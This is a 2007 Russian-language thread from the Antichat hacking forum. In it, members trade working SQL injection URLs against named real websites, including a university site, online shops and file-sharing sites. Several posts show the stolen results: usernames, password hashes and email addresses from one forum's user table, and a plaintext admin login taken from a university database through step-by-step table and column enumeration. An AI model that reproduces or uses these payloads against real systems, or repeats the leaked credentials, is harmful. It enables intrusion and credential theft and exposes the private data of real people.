Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.09.2007, 17:32
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Код:
http://infoshop.zaraz.org/?r=3&list_exp=-1+union+select+null,null,null,null,concat_ws(char(58),username,password,email),null,null,null,null,null,null,null,null,null+from+phorum_users/*
Код:
admin:3fd07483d0d44301fc0e987a6a517693:phorum@zaraz.org # z2r2z
magduv:1eaf7c068a250a38e3bab770053c14c3:facilitator@mail.ru
test:098f6bcd4621d373cade4e832627b4f6:test@test.com
жТБХОЗПЖЕТ:bd40cd94a7ccf4b802b1090af055afaa:paz.zapped@ua.fm
Tvorog:11967d5e9addc5416ea9224eee0e91fc:tvaroh@ukr.net # huy
matvey:7c7d80ae76edbe1c202a4e2baa3c271b:matvey@gmail.com
аккаунты admin и test не активированы
http://phorum.zaraz.org/admin.php
Phorum Admin
version 5.0.5-beta
сам форум и админка |
|
|
05.09.2007, 17:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Инъекция в Oracle:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =1+--
PL/SQL Release 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =2+--
CORE 8.1.7.0.0 Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =3+--
TNS for Linux: Version 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =4+--
NLSRTL Version 3.4.1.0.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =5+--
|
|
|
|
05.09.2007, 18:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Произведение команды Sоlоx
оч интересная базюка
Код:
http://www.flowers.kg/rus/index.php?mode=showother&id=-23+union+select+1,2,concat_ws(0x3a,table_name,table_schema,version(),database()),4+from+information_schema.tables
там еще лежат заготовки к базам всех проектов этой студии ))
хмм, только вот ничо путевого там не нашел |
|
|
|
05.09.2007, 19:38
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
sbornikmp3.ru
Код:
http://www.sbornikmp3.ru/details.php?album=58869+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Прошелся по названием таблиц из соседней темы, не одной таблицы не подобрал
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
05.09.2007, 20:36
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Oracle.
www.bmcc.cuny.edu
Версия:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,banner,1+from+v$version--&dep=
CORE 10.1.0.3.0 Production
NLSRTL Version 10.1.0.3.0 - Production
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
TNS for Linux: Version 10.1.0.3.0 - Production
Таблицы:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,table_name,1+from+sys.all_tables--&dep=
интересная USERS
Столбцы:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,column_name,1+from+sys.all_tab_columns--&dep=
username, password
Вытаскиваем:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,concat(username,concat(chr(59),password)),1+from+users--&dep=
admin;lrc_01
|
|
|
|
06.09.2007, 01:18
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+20,1/*
|
|
|
|
06.09.2007, 12:36
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Интернет-магазин парфюмерии Zemen :/
http://www.zemen.ru/product_info.php?product s_id=-1546+union+ select+1/*
|
|
|
|
06.09.2007, 15:46
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.ascon.ru/order.php?id=-11+union+select+1,2,table_name,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
хостинг:
Код:
http://www.officinaweb.com/hosting.php?id=-5+union+select+1,2,3,4/*
Последний раз редактировалось SWAT; 06.09.2007 в 16:33..
|
|
|
|
06.09.2007, 17:44
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
sharelita.com
4.1.21-standard:test  nkel_onkel@localhost
Код:
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
07.09.2007, 00:53
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Сообщение от l-l00K
sharelita.com
4.1.21-standard:test nkel_onkel@localhost
Код:
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+
На этом сайте уже обнаружена инекция
http://forum.antichat.ru/showthread.php?p=438529#post438529
ты просто нашёл на таком же файле,просто с больше количеством таблиц 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
